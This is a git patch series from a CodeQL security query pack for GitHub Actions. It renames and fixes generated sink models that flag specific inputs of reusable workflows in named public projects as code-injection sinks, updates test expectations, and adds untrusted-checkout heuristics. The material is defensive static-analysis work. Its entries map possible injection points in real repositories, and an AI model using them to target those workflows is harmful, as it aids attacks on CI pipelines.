+++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.pace", "code-injection", "generated"] - - ["urbit/urbit/.github/workflows/shared.yml", "*", "inputs.next", "code-injection", "generated"] \ No newline at end of file + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] + - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index 47f53f495f83..c739b5750ccb 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.server_id", "code-injection", "generated"] - - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "inputs.secondary_tests", "code-injection", "generated"] \ No newline at end of file + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] + - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 1b592aa91cc4..7ac3c0fb530e 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "inputs.hz", "code-injection", "generated"] - - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "inputs.hz", "code-injection", "generated"] \ No newline at end of file + - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] + - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index db4e957a87a3..c641035f9662 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "inputs.workspace", "code-injection", "generated"] \ No newline at end of file + - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index c3642c84f631..adea8ae4bd2c 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 3e6691f0e8f7..857c946e2b78 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 733c2e20a719..717022ea6e83 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "inputs.version", "code-injection", "generated"] - - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows-msvc.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-ubuntu.yml", "*", "input.version", "code-injection", "generated"] + - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-manylinux.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index cb80f74e4e89..7dadb99209db 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index 0f78ea086a6c..ca3cb0091e90 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", 
"code-injection", "generated"] \ No newline at end of file + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", "code-injection", "generated"] \ No newline at end 
of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index e2bf8f96fa95..6faf8b900578 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 4a8500a147eb..39b6773a2b19 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 3e362cebc584..cbbce950b419 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 9e5f6e3541e2..48206551bcd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 89fbb5dbf700..256ad3f0e042 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index f7ee9b66305b..ae408b131e08 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel From d18c575cd4848c5b68d95f97ab3f8943a7a0ca1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:22:45 +0200 Subject: [PATCH 178/707] fix broken models --- .../apache_incubator-kie-tools.model.yml | 4 +-- .../streetsidesoftware_cspell.model.yml | 4 +-- ql/test/library-tests/test.expected | 35 +++++++++++++++++++ 3 files changed, 39 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 37f3efbededb..2e28ad9e900c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: summaryModel data: - - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 1f087287d257..70b2c362464e 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -5,7 +5,7 @@ extensions: data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel + pack: githubsecuritylab/actions-all + extensible: summaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c08d4c824e1a..8dfd57567d53 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -399,6 +399,7 @@ sources | dorny/paths-filter | * | output.changes | PR changed files | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | | jitterbit/get-changed-files | * | output.added | PR changed files | manual | | jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | | jitterbit/get-changed-files | * | output.all | PR changed files | manual | 
@@ -408,6 +409,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | | marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | | tj-actions/branch-names | * | output.current_branch | PR current branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | @@ -439,6 +441,7 @@ sources summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | 
@@ -452,14 +455,22 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | 
frabert/replace-string-action | * | input.string | output.replaced | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | 
@@ -469,14 +480,29 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | | haya14busa/action-cond | * | input.if_false | output.value | taint | manual | | haya14busa/action-cond | * | input.if_true | output.value | taint | manual | | hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | 
output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | 
@@ -484,13 +510,22 @@ summaries | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | 
taint | manual | calls | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | From bd9cd3eb8680757845031da5e5837277a03a616b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:15:59 +0200 Subject: [PATCH 179/707] new untrusted checkout step --- ql/lib/ext/sergeysova_jq-action.model.yml | 7 +++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 21 ++++++++++++++++++- .../.github/workflows/untrusted_checkout2.yml | 19 +++++++++++++++++ 3 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 ql/lib/ext/sergeysova_jq-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml new file mode 100644 index 000000000000..8ab1d090b1cc --- /dev/null +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] + diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 40f6d2fec9e6..c9cbb0ab13c7 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,7 +66,8 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" + // heuristics + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" ], _, _) ) } 
